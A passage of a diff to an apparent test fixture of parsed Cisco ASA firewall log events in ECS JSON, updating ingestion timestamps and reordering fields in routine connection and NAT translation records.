68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994771300Z", + "ingested": "2021-12-14T14:38:25.938763682Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994779800Z", + "ingested": "2021-12-14T14:38:25.938764426Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994786200Z", + "ingested": "2021-12-14T14:38:25.938765074Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994792400Z", + "ingested": "2021-12-14T14:38:25.938765734Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994798900Z", + "ingested": "2021-12-14T14:38:25.938766886Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994805300Z", + "ingested": "2021-12-14T14:38:25.938767527Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994811600Z", + "ingested": "2021-12-14T14:38:25.938768186Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994817800Z", + "ingested": "2021-12-14T14:38:25.938769056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994823900Z", + "ingested": "2021-12-14T14:38:25.938769686Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994830300Z", + "ingested": "2021-12-14T14:38:25.938770478Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994836700Z", + "ingested": "2021-12-14T14:38:25.938771184Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:33:41.994843Z", + "ingested": "2021-12-14T14:38:25.938771825Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994848500Z", + "ingested": "2021-12-14T14:38:25.938772530Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994853800Z", + "ingested": "2021-12-14T14:38:25.938773265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994860Z", + "ingested": "2021-12-14T14:38:25.938773961Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994866400Z", + "ingested": "2021-12-14T14:38:25.938774628Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994871Z", + "ingested": "2021-12-14T14:38:25.938775512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994876100Z", + "ingested": "2021-12-14T14:38:25.938776205Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994882400Z", + "ingested": "2021-12-14T14:38:25.938776879Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994887500Z", + "ingested": "2021-12-14T14:38:25.938777537Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994892800Z", + "ingested": "2021-12-14T14:38:25.938778199Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994897200Z", + "ingested": "2021-12-14T14:38:25.938778924Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994902600Z", + "ingested": "2021-12-14T14:38:25.938779670Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994908800Z", + "ingested": "2021-12-14T14:38:25.938780330Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994915Z", + "ingested": "2021-12-14T14:38:25.938781094Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994921500Z", + "ingested": "2021-12-14T14:38:25.938781756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994927800Z", + "ingested": "2021-12-14T14:38:25.938782462Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994934400Z", + "ingested": "2021-12-14T14:38:25.938783418Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994940600Z", + "ingested": "2021-12-14T14:38:25.938784274Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994947700Z", + "ingested": "2021-12-14T14:38:25.938785039Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994954Z", + "ingested": "2021-12-14T14:38:25.938785638Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", @@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994960800Z", + "ingested": "2021-12-14T14:38:25.938786357Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994967800Z", + "ingested": "2021-12-14T14:38:25.938786956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994974Z", + "ingested": "2021-12-14T14:38:25.938787686Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994980400Z", + "ingested": "2021-12-14T14:38:25.938788357Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994986700Z", + "ingested": "2021-12-14T14:38:25.938789080Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994993100Z", + "ingested": "2021-12-14T14:38:25.938789641Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994998600Z", + "ingested": "2021-12-14T14:38:25.938790222Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995002700Z", + "ingested": "2021-12-14T14:38:25.938790795Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995007500Z", + "ingested": "2021-12-14T14:38:25.938791417Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995013800Z", + "ingested": "2021-12-14T14:38:25.938792049Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", @@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995020100Z", + "ingested": "2021-12-14T14:38:25.938792698Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995024700Z", + "ingested": "2021-12-14T14:38:25.938793447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995030300Z", + "ingested": "2021-12-14T14:38:25.938794336Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995036800Z", + "ingested": "2021-12-14T14:38:25.938795232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995041700Z", + "ingested": "2021-12-14T14:38:25.938795944Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995046700Z", + "ingested": "2021-12-14T14:38:25.938796608Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995051Z", + "ingested": "2021-12-14T14:38:25.938797340Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995056700Z", + "ingested": "2021-12-14T14:38:25.938798043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995063500Z", + "ingested": "2021-12-14T14:38:25.938798789Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995068600Z", + "ingested": "2021-12-14T14:38:25.938799831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995074900Z", + "ingested": "2021-12-14T14:38:25.938800495Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995081200Z", + "ingested": "2021-12-14T14:38:25.938801131Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995087600Z", + "ingested": "2021-12-14T14:38:25.938801850Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995094100Z", + "ingested": "2021-12-14T14:38:25.938802657Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995100500Z", + "ingested": "2021-12-14T14:38:25.938803532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995106700Z", + "ingested": "2021-12-14T14:38:25.938804451Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995113Z", + "ingested": "2021-12-14T14:38:25.938805164Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995119200Z", + "ingested": "2021-12-14T14:38:25.938805859Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995125500Z", + "ingested": "2021-12-14T14:38:25.938806580Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995132200Z", + "ingested": "2021-12-14T14:38:25.938807220Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995138500Z", + "ingested": "2021-12-14T14:38:25.938807901Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995144200Z", + "ingested": "2021-12-14T14:38:25.938808518Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995149800Z", + "ingested": "2021-12-14T14:38:25.938809203Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995154500Z", + "ingested": "2021-12-14T14:38:25.938809959Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995159900Z", + "ingested": "2021-12-14T14:38:25.938810728Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995166300Z", + "ingested": "2021-12-14T14:38:25.938811447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", @@ -6063,25 +6060,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995170900Z", + "ingested": "2021-12-14T14:38:25.938812485Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995176200Z", + "ingested": "2021-12-14T14:38:25.938813148Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", @@ -6157,25 +6154,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": 